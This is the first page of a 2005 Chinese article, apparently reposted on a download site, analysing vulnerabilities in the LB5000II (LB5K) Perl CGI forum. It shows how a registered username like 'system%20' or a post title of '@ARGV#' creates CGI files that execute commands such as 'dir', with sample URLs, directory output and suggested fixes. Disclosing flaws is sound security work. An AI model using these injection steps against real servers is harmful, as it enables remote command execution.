文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 国产软件 | 国外软件 | 汉化补丁 | 设为首页 | 加入收藏
业界资讯 | 图形图像 | 操作系统 | 网络冲浪 | 工具软件 | 办公软件 | 媒体动画 | 精文荟萃 | 认证考试 | 网站建设 | 技术开发 | 专栏
当前位置:abcdown网络学院网络技术网络安全LB5K安全性分析
精品广告
推荐TOP10
·网吧IP自动修改程序
·Windows权限设置详解
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
阅读TOP10
·恢复本来面目 消除JPEG图片马赛克
·netcat使用指南
·网吧IP自动修改程序
·Windows权限设置详解
·端口详解(1)-端口分配表
·利用X-scan实现DDoS Ping攻击
·Remote Administrator v2.1 配置文件
·命令行模式改变本地安全策略
·怎样让别人中木马-木马常用骗术大观
·端口详解(2)-端口的分类

LB5K安全性分析

日期:2005年3月24日 作者:清风网络学院 查看:[大字体 中字体 小字体]


LB5K是国内最流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新版本是LB5000II v1103,可以从http://www.leoboard.com/cgi-bin/lbdown.cgi?ver=LB5000II下载。

 乍看起来,作者似乎已经改正了前段时间的所有BUG,这包括以前Win32平台创建后门的问题和后来跨平台的“search.cgi”问题,但是实际情况好象并不是这样。下面我将比较深入的剖析一下LB5K存在的几大功能漏洞,当然我也会提出对应的临时解决方法。 

下面我只以Win32平台为例介绍一下,而且只是以Perl CGI方式介绍,至于Perl ISAPI方式请自己参考相关文档。

 声明:本文只是出于教育的目的,请不要利用本文的内容进行任何破坏,否则后果自负!

 【用户注册功能漏洞】

显然作者看过我写的那篇文章《怎样利用Perl CGILB5K的缺陷攻占远程服务器》,但是作者是怎么解决这个问题的呢?我们看一下相关代码:

 [register.cgi] L185~L189

       $bannedmember = "yes" if (($inmembername eq "system")||($inmembername eq "admin")||($inmembername eq "root")||($inmembername eq "copy")||($inmembername eq "require")||($inmembername eq "rename")||($inmembername eq "dir"));

    if ($bannedmember eq "yes") {

            print header(-charset=>gb2312); &error("用户注册&对不起,你不允许注册,请联系论坛管理员以便解决!");

        }

 

作者过滤了“system”和一些其它帐号,且不说过滤的帐号是不是全面,单从这种过滤的方法来看,就很容易绕过。不让注册“system”,我们可以注册“system%20”嘛,测试一下:

 

http://www.notfound.org/cgi-bin/members/system.cgi?dir

 

C:\Inetpub\cgi-bin\members 的目录

 

2001-11-05  16:29       <DIR>          .

2001-11-05  16:29       <DIR>          ..

2001-11-05  16:24                  184 system.cgi

               1 个文件            184 字节

               2 个目录  1,939,226,624 可用字节

 不用我多说了吧?

临时解决方法:

* 限制帐号密码只能为字母数字组合,且长度为38

 【发文章功能漏洞】

好了,我们假设已经对帐号密码进行了限制,下面我们来看看发文章功能有什么问题。假设用户system已经登陆进入系统,下面他要发一篇文章:

 http://www.notfound.org/cgi-bin/post.cgi?action=new&forum=1

 主题标题:@ARGV#

内容:thiz is a test!

 提交。=版权所有  软件 下载  学院  版权所有=

 我们来看一下:

 

http://www.notfound.org/cgi-bin/forum1/1.thd.cgi?dir

 

C:\Inetpub\cgi-bin\forum1 的目录

 

2001-11-05  17:10       <DIR>          .

2001-11-05  17:10       <DIR>          ..

2001-11-05  15:24                  150 .htaccess

2001-11-05  17:10                   72 1.pl

2001-11-05  17:10                   70 1.thd.cgi

2001-11-05  15:24                   85 foruminfo.cgi

2001-11-05  15:24                    1 index.html

2001-11-05  17:10                    1 lastnum.cgi

2001-11-05  17:10                   74 list.cgi

               7 个文件            453 字节

2 个目录  1,938,771,968 可用字节

 

我们看一下“post.cgi”的相关代码:

 

[post.cgi]L431~L432

 

    elsif ($intopictitle eq "")         { &error("发表新主题&必须输入主题标题!"); }

elsif (length($intopictitle) > 82)  { &error("发表新主题&主题标题过长!"); }

 

[post.cgi]L436~L444

 

    $intopictitle =~ s/(


 


[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] 下一页 

上一篇:ACDSee 4.0让我一次看个够

下一篇:各有千秋:惠普三台新款品牌电脑浅析(图)


相关软件: 相关文章:
·提升Outlook Express安全性5要素
·浅论交换机配置中的安全性!
·新手学堂:Linux操作系统安全性能检查笔记
·招行 工行 建行 兴业 恒生网银安全性比较
·借助Cisco交换机增强企业网安全性
·数据库安全性策略
·如何用IIS建立高安全性Web服务器 《转》

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.abcdown.net
首页 | 本站声明 | 下载帮助 | 发布软件 |
中文版权所有:ABC学院 浙ICP备05000717号